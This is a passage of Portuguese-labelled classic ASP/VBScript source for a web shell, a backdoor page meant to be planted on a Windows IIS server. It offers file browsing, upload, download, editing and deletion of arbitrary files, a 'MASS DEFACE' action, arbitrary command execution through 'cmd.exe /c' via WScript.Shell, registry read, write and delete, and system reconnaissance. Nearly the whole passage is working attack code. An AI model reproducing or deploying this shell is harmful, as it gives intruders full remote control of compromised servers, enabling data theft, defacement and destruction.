Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br></font>"
|
||||
If Trim(Request.QueryString("raiz")) = "root" Then
|
||||
Set fs=Server.Createobject("Scripting.FileSystemObject")
|
||||
Set drivecollection=fs.drives
|
||||
Response.Write "<font face=""arial"" size=""2"">"
|
||||
For Each drive IN drivecollection
|
||||
str=drive.driveletter & ":"
|
||||
Response.Write "<b><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
|
||||
Select Case drive.DriveType
|
||||
Case 0
|
||||
tipodrive = "Unknown"
|
||||
nomedrive = drive.VolumeName
|
||||
Case 1
|
||||
tipodrive = "Removable"
|
||||
If drive.isready Then
|
||||
nomedrive = drive.VolumeName
|
||||
Else
|
||||
nomedrive = ""
|
||||
End If
|
||||
Case 2
|
||||
tipodrive = "Fixed"
|
||||
If drive.isready Then
|
||||
nomedrive = drive.VolumeName
|
||||
Else
|
||||
nomedrive = ""
|
||||
End If
|
||||
Case 3
|
||||
tipodrive = "Network"
|
||||
If drive.isready Then
|
||||
nomedrive = drive.ShareName
|
||||
Else
|
||||
nomedrive = ""
|
||||
End If
|
||||
Case 4
|
||||
tipodrive = "CD-Rom"
|
||||
If drive.isready Then
|
||||
nomedrive = drive.VolumeName
|
||||
Else
|
||||
nomedrive = ""
|
||||
End If
|
||||
Case 5
|
||||
tipodrive = "RAM Disk"
|
||||
If drive.isready Then
|
||||
nomedrive = drive.VolumeName
|
||||
Else
|
||||
nomedrive = ""
|
||||
End If
|
||||
End Select
|
||||
response.write "<b>Tipo:</b> " & tipodrive & "<br>"
|
||||
response.write "<b>Nome: </b>" & nomedrive & "<br>"
|
||||
response.write "<b>Sistema de Arquivos: </b>"
|
||||
If drive.isready Then
|
||||
set sp=fs.getdrive(str)
|
||||
response.write sp.filesystem & "<br>"
|
||||
Else
|
||||
response.write "-<br>"
|
||||
End If
|
||||
Response.Write "<b>Espaço Livre: </b>"
|
||||
If drive.isready Then
|
||||
freespace = (drive.AvailableSpace / 1048576)
|
||||
set sp=fs.getdrive(str)
|
||||
response.write(Round(freespace,1) & " MB<br>")
|
||||
Else
|
||||
response.write("-<br>")
|
||||
End If
|
||||
Response.Write "<b>Espaço Total: </b>"
|
||||
If drive.isready Then
|
||||
totalspace = (drive.TotalSize / 1048576)
|
||||
set sp=fs.getdrive(str)
|
||||
response.write(Round(totalspace,1) & " MB<br>")
|
||||
Else
|
||||
response.write("-<br>")
|
||||
End If
|
||||
Response.Write "<br>"
|
||||
Next
|
||||
Response.Write "</font>"
|
||||
Set fs = Nothing
|
||||
Set drivecollection = Nothing
|
||||
set sp=Nothing
|
||||
Else
|
||||
If Trim(Request.QueryString("raiz")) = "" Then
|
||||
caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
|
||||
pos = Instr(caminho,"\")
|
||||
pos2 = 1
|
||||
While pos2 <> 0
|
||||
If Instr(pos + 1,caminho,"\") <> 0 Then
|
||||
pos = Instr(pos + 1,caminho,"\")
|
||||
Else
|
||||
pos2 = 0
|
||||
End If
|
||||
Wend
|
||||
raiz = Left(caminho,pos)
|
||||
Else
|
||||
raiz = trim(Request.QueryString("raiz")) & "\"
|
||||
End If
|
||||
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
|
||||
Set MonRep = ObjFSO.GetFolder(raiz)
|
||||
Set ColFolders = MonRep.SubFolders
|
||||
Set ColFiles0 = MonRep.Files
|
||||
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,height=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font><br><br>"
|
||||
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,height=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font><br><br>"
|
||||
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
|
||||
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=760,height=540,scrollbars=YES,resizable')"">PROMPT</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=760,height=450,scrollbars=YES,resizable')"">SYS INFO</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=550,height=250,scrollbars=YES,resizable')"">REGEDIT</a></font><br><br>"
|
||||
Response.Write "<font face='arial'><b>Root Folder: " & raiz & "</b></font><br><br>"
|
||||
If CInt(Len(raiz) - 1) <> 2 Then
|
||||
barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
|
||||
backlevel = Left(raiz,barrapos)
|
||||
Response.Write "<font face='arial' size='2'><b><DIR><a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "'> . . </font></b></a><br>"
|
||||
Else
|
||||
Response.Write "<font face='arial' size='2'><b><DIR><a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . . </font></b></a><br>"
|
||||
End If
|
||||
Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
|
||||
for each folderItem in ColFolders
|
||||
Response.Write "<tr><td><font face='arial' size='2'><b><DIR> <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & folderItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseline'> <font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=YES,resizable')""><< PUT</a></font></td></tr>"
|
||||
next
|
||||
Response.Write "</table><br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
|
||||
marcatabela = true
|
||||
for each FilesItem0 in ColFiles0
|
||||
If marcatabela = true then
|
||||
corfundotabela = " bgcolor=""#EEEEEE"""
|
||||
Else
|
||||
corfundotabela = ""
|
||||
End If
|
||||
Response.Write "<tr><td" & corfundotabela & "><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'" & corfundotabela & "><font face='arial' size='1'> " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes </font></td><td valign='baseline'" & corfundotabela & "> <font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign='baseline'" & corfundotabela & "> <font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></td><td valign='baseline'" & corfundotabela & "> <font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o</a></font></td><td valign='baseline'" & corfundotabela & "> <font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resizable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & "> <font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,scrollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & corfundotabela & "> <font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(FilesItem0.path,"\","|") & """>o.DOWNLOAD.o</a></font></td></tr>"
|
||||
marcatabela = NOT marcatabela
|
||||
next
|
||||
Response.Write "</table>"
|
||||
End If
|
||||
End Sub
|
||||
Select Case Trim(Request.QueryString("action"))
|
||||
Case "get"
|
||||
checa = checking(cprthtml,keydec)
|
||||
Call hdr()
|
||||
Response.Write copyright & onlinehelp
|
||||
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
|
||||
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
|
||||
Set MyFile = ObjFSO.GetFile(caminho)
|
||||
destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
|
||||
MyFile.Copy (destino)
|
||||
If Err.Number = 0 Then
|
||||
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>copiado para: " & destino
|
||||
End If
|
||||
Case "put"
|
||||
checa = checking(cprthtml,keydec)
|
||||
Call hdr()
|
||||
Response.Write copyright & onlinehelp
|
||||
If Trim(Request.QueryString("arquivo")) = "" Then
|
||||
caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
|
||||
varpath = Trim(Request.QueryString("path"))
|
||||
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
|
||||
Set MonRep = ObjFSO.GetFolder(caminho)
|
||||
Set ColFolders = MonRep.SubFolders
|
||||
Set ColFiles0 = MonRep.Files
|
||||
|
||||
Response.Write "<font face='arial' size='2'><b>Selecione o arquivo: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
|
||||
for each FilesItem0 in ColFiles0
|
||||
Response.Write "<tr><td><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='arial' size='1'> " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes </font></td><td valign='baseline'> <font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SELECIONAR ::</a></font></td></tr>"
|
||||
next
|
||||
Response.Write "</table>"
|
||||
Else
|
||||
destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
|
||||
arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
|
||||
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
|
||||
Set MyFile = ObjFSO.GetFile(arquivo)
|
||||
MyFile.Copy (destino)
|
||||
If Err.Number = 0 Then
|
||||
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & arquivo & "</b><br>copiado para: <b>" & destino
|
||||
End If
|
||||
End If
|
||||
Case "del"
|
||||
checa = checking(cprthtml,keydec)
|
||||
Call hdr()
|
||||
Response.Write copyright & onlinehelp
|
||||
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
|
||||
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
|
||||
Set MyFile = ObjFSO.GetFile(caminho)
|
||||
MyFile.Delete
|
||||
If Err.Number = 0 Then
|
||||
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
|
||||
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo <b>" & caminho & "</b> apagado<br>"
|
||||
End If
|
||||
Case "ren"
|
||||
checa = checking(cprthtml,keydec)
|
||||
Call hdr()
|
||||
Response.Write copyright & onlinehelp
|
||||
If Trim(Request.QueryString("status")) <> "2" Then
|
||||
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
|
||||
arquivo = showobj(caminho)
|
||||
Response.Write "<br><font face=""arial"" size=""2""><b>" & arquivo & "</b><br>" & _
|
||||
"<form action=""" & Request.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
|
||||
"<input type=""hidden"" name=""action"" value=""ren"">" & _
|
||||
"<input type=""hidden"" name=""status"" value=""2"">" & _
|
||||
"<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
|
||||
"Digite o novo nome: <input type=""text"" name=""newname"">" & _
|
||||
" <input type=""submit"" value=""alterar"">" & _
|
||||
"</form>"
|
||||
Else
|
||||
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
|
||||
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
|
||||
Set MyFile = ObjFSO.GetFile(caminho)
|
||||
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
|
||||
MyFile.Move (destino)
|
||||
If Err.Number = 0 Then
|
||||
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
|
||||
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
|
||||
End If
|
||||
End If
|
||||
Case "error"
|
||||
Response.Write "<center><font face='arial' size='2' color='red'> <b>CÓDIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
|
||||
Case "cmd"
|
||||
checa = checking(cprthtml,keydec)
|
||||
Call hdr()
|
||||
Response.Write copyright & onlinehelp
|
||||
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
|
||||
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
||||
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
|
||||
szCMD = Request.QueryString(".CMD")
|
||||
If (szCMD <> "") Then
|
||||
szTempFile = "c:\" & oFileSys.GetTempName( )
|
||||
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
||||
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
|
||||
End If
|
||||
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><input type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit value=""Run""></FORM><br><br> "
|
||||
If (IsObject(oFile)) Then
|
||||
On Error Resume Next
|
||||
Response.Write "<font face=""arial"">"
|
||||
Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"<br>")," "," ")
|
||||
oFile.Close
|
||||
Call oFileSys.DeleteFile(szTempFile, True)
|
||||
End If
|
||||
Case "info"
|
||||
checa = checking(cprthtml,keydec)
|
||||
Call hdr()
|
||||
Response.Write copyright & onlinehelp
|
||||
Set WshNetwork = Server.CreateObject("WScript.Network")
|
||||
Set WshShell = Server.CreateObject("WScript.Shell")
|
||||
Set WshEnv = WshShell.Environment("SYSTEM")
|
||||
Response.Write "<br><font face=arial size=2>"
|
||||
Response.Write "<b>IDENTIFICAÇÃO DE REDE:</b><br>"
|
||||
Response.Write "<b>Usuário: </b>" & WshNetwork.UserName & "<br>"
|
||||
Response.Write "<b>Nome do Computador: </b>" & WshNetwork.ComputerName & "<br>"
|
||||
Response.Write "<b>Usuário do Domínio: </b>" & WshNetwork.UserDomain & "<br>"
|
||||
Set Drives = WshNetwork.EnumNetworkDrives
|
||||
For i = 0 to Drives.Count - 1
|
||||
Response.Write "<b>Drive de Rede (Mapeado): </b>" & Drives.Item(i) & "<br>"
|
||||
Next
|
||||
Response.Write "<br><b>FÍSICO:</b><br>"
|
||||
Response.Write "<b>Arquitetura do Processador: </b>" & WshEnv("PROCESSOR_ARCHITECTURE") & "<br>"
|
||||
Response.Write "<b>Número de Processadores: </b>" & WshEnv("NUMBER_OF_PROCESSORS") & "<br>"
|
||||
Response.Write "<b>Identificador do Processador: </b>" & WshEnv("PROCESSOR_IDENTIFIER") & "<br>"
|
||||
Response.Write "<b>Nível do Processador: </b>" & WshEnv("PROCESSOR_LEVEL") & "<br>"
|
||||
Response.Write "<b>Revisão do Processador: </b>" & WshEnv("PROCESSOR_REVISION") & "<br>"
|
||||
Response.Write "<br><b>LÓGICO:</b><br>"
|
||||
Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_ADDR") & "<br>"
|
||||
Response.Write "<b>Sistema Operacional: </b>" & WshEnv("OS") & "<br>"
|
||||
Response.Write "<b>Servidor Web: </b>" & request.servervariables("SERVER_SOFTWARE") & "<br>"
|
||||
Response.Write "<b>Especificação do Command: </b>" & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "<br>"
|
||||
Response.Write "<b>Caminhos no Path: </b>" & WshEnv("PATH") & "<br>"
|
||||
Response.Write "<b>Executáveis: </b>" & WshEnv("PATHEXT") & "<br>"
|
||||
Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
|
||||
Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "<br>"
|
||||
Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "<br>"
|
||||
Response.Write "<b>Caminho do System32: </b>" & WshShell.CurrentDirectory & "<br>"
|
||||
Set Drives = Nothing
|
||||
Set WshNetwork = Nothing
|
||||
Set WshShell = Nothing
|
||||
Set WshEnv = Nothing
|
||||
Case "reg"
|
||||
checa = checking(cprthtml,keydec)
|
||||
Call hdr()
|
||||
Response.Write copyright & onlinehelp
|
||||
Set WshShell = Server.CreateObject("WScript.Shell")
|
||||
Response.Write "<font face=""arial"" size=""2""><b>Editor de Registro:</b><br><br>"
|
||||
Select Case Trim(Request.QueryString("regaction"))
|
||||
Case "w"
|
||||
If Trim(Request.QueryString("process")) = "yes" Then
|
||||
Select Case Trim(Request.QueryString("type"))
|
||||
Case "1"
|
||||
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
|
||||
Case "2"
|
||||
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
|
||||
Case "3"
|
||||
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
|
||||
Case "4"
|
||||
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
|
||||
Case "5"
|
||||
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
|
||||
End Select
|
||||
Response.Write "<center><br><font face=""arial"" size=""2"">Registro <b>"
|
||||
Response.Write Trim(Request.QueryString("key")) & "</b> Escrito</center>"
|
||||
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
|
||||
Else
|
||||
Response.Write "<table><tr><td><font face=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABREVIAÇÃO</td></tr>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU </td></tr>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKLM </td></tr>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR </td></tr>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS </td></tr>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HKEY_CURRENT_CONFIG </td></tr></table><br>"
|
||||
Response.Write "<table><tr><td><font face=""arial"" size=""2"">Tipo </td><td><font face=""arial"" size=""2""> Descrição </td><td><font face=""arial"" size=""2""> Na forma de </td></tr>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> string </td><td><font face=""arial"" size=""1""> string </td></tr>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> número </td><td><font face=""arial"" size=""1""> inteiro </td></tr>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> valor binário </td><td><font face=""arial"" size=""1""> VBArray de inteiros </td></tr>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> string expandível (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> string </td></tr>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> array de strings </td><td><font face=""arial"" size=""1""> VBArray de strings </td></tr></table>"
|
||||
Response.Write "<br><br><FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
|
||||
Response.Write "<table><tr><td><font face=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font face=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )</td></tr>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
|
||||
Response.Write "<OPTION VALUE=""1"">REG_SZ </option>"
|
||||
Response.Write "<OPTION VALUE=""2"">REG_DWORD </option>"
|
||||
Response.Write "<OPTION VALUE=""3"">REG_BINARY </option>"
|
||||
Response.Write "<OPTION VALUE=""4"">REG_EXPAND_SZ </option>"
|
||||
Response.Write "<OPTION VALUE=""5"">REG_MULTI_SZ </option></select><br>"
|
||||
Response.Write "<input type=""hidden"" name=""regaction"" value=""w"">"
|
||||
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
|
||||
Response.Write "<input type=""hidden"" name=""process"" value=""yes""></td></tr>"
|
||||
Response.Write "<tr><td></td><td><input type=""submit"" value=""OK""></form></td></tr></table>"
|
||||
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
|
||||
End If
|
||||
Case "r"
|
||||
If Trim(Request.QueryString("process")) = "yes" Then
|
||||
Response.Write "<font face=""arial"" size=""2"">" & Trim(Request.QueryString("key")) & "<br>"
|
||||
Response.Write "Valor: <b>" & WshShell.RegRead (Trim(Request.QueryString("key")))
|
||||
Else
|
||||
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
|
||||
Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
|
||||
Response.Write "<input type=""hidden"" name=""regaction"" value=""r"">"
|
||||
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
|
||||
Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
|
||||
Response.Write "<input type=""submit"" value=""OK""></form>"
|
||||
End If
|
||||
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
|
||||
Case "d"
|
||||
If Trim(Request.QueryString("process")) = "yes" Then
|
||||
teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
|
||||
Response.Write "Chave <b>" & Trim(Request.QueryString("key")) & " </b>deletada"
|
||||
Else
|
||||
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
|
||||
Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
|
||||
Response.Write "<input type=""hidden"" name=""regaction"" value=""d"">"
|
||||
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
|
||||
Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
|
||||
Response.Write "<input type=""submit"" value=""OK""></form>"
|
||||
End If
|
||||
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
|
||||
Case Else
|
||||
Response.Write "<font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg®action=w"">ESCREVER CHAVE</a><br><br>"
|
||||
Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg®action=r"">LER CHAVE</a><br><br>"
|
||||
Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg®action=d"">DELETAR CHAVE</a><br>"
|
||||
End Select
|
||||
Set WshShell = Nothing
|
||||
Case "txtview"
|
||||
checa = checking(cprthtml,keydec)
|
||||
Call hdr()
|
||||
Response.Write copyright & onlinehelp & "<font face=""arial"" size=""2"">"
|
||||
file = Replace(Trim(Request.QueryString("file")),"|","\")
|
||||
Set fso = CreateObject("Scripting.FileSystemObject")
|
||||
Set a = fso.OpenTextFile(file)
|
||||
Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"<br>")," "," ")
|
||||
Set a = Nothing
|
||||
Set fso = Nothing
|
||||
Case "txtedit"
|
||||
checa = checking(cprthtml,keydec)
|
||||
Call hdr()
|
||||
Response.Write copyright & onlinehelp
|
||||
If Request.Form.Count = 0 Then
|
||||
file = Replace(Trim(Request.QueryString("file")),"|","\")
|
||||
Set fso = CreateObject("Scripting.FileSystemObject")
|
||||
Set a = fso.OpenTextFile(file)
|
||||
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
|
||||
Response.Write "<textarea cols='85' rows='25' name=""content"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
|
||||
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("file")) & """>"
|
||||
Response.Write "<input type=""submit"" name=""savemethod"" value=""Save""> <input type=""submit"" name=""savemethod"" value=""Save as""></form>"
|
||||
Set a = Nothing
|
||||
Set fso = Nothing
|
||||
Else
|
||||
Select Case Trim(Request.Form("savemethod"))
|
||||
Case "Save"
|
||||
Set fso = CreateObject("Scripting.FileSystemObject")
|
||||
novotexto = Trim(Request.Form("content"))
|
||||
novotexto = Split(novotexto,vbCrLf)
|
||||
Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
|
||||
For i = 0 To UBound(novotexto)
|
||||
objstream.WriteLine(novotexto(i))
|
||||
Next
|
||||
objstream.Close
|
||||
Set objstream = Nothing
|
||||
Response.Write "Texto salvo: <b>" & Replace(Trim(Request.Form("path")),"|","\") & "</b>"
|
||||
Case "Save as"
|
||||
Set fso = CreateObject("Scripting.FileSystemObject")
|
||||
novotexto = Trim(Request.Form("content"))
|
||||
novotexto = Split(novotexto,vbCrLf)
|
||||
caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
|
||||
Set objstream = fso.CreateTextFile(caminho,true,false)
|
||||
For i = 0 To UBound(novotexto)
|
||||
objstream.WriteLine(novotexto(i))
|
||||
Next
|
||||
objstream.Close
|
||||
Set objstream = Nothing
|
||||
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
|
||||
Response.Write "<input type=""text"" name=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\")) & """><br>"
|
||||
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.Form("path")) & """>"
|
||||
Response.Write "<input type=""submit"" name=""savemethod2"" value=""Save""></form>"
|
||||
Case Else
|
||||
caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
|
||||
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
|
||||
Set MyFile = ObjFSO.GetFile(caminho)
|
||||
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
|
||||
MyFile.Move (destino)
|
||||
If Err.Number = 0 Then
|
||||
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
|
||||
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
|
||||
End If
|
||||
End Select
|
||||
End If
|
||||
Case "download"
|
||||
Response.Buffer = True
|
||||
Response.Clear
|
||||
strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
|
||||
strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
|
||||
strFileType = Request.QueryString("type")
|
||||
if strFileType = "" then strFileType = "application/download"
|
||||
Set fso = Server.CreateObject("Scripting.FileSystemObject")
|
||||
Set f = fso.GetFile(strFilename)
|
||||
intFilelength = f.size
|
||||
Set f = Nothing
|
||||
Set fso = Nothing
|
||||
Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
|
||||
Response.AddHeader "Content-Length", intFilelength
|
||||
Response.Charset = "UTF-8"
|
||||
Response.ContentType = strFileType
|
||||
Set Stream = Server.CreateObject("ADODB.Stream")
|
||||
Stream.Open
|
||||
Stream.type = 1
|
||||
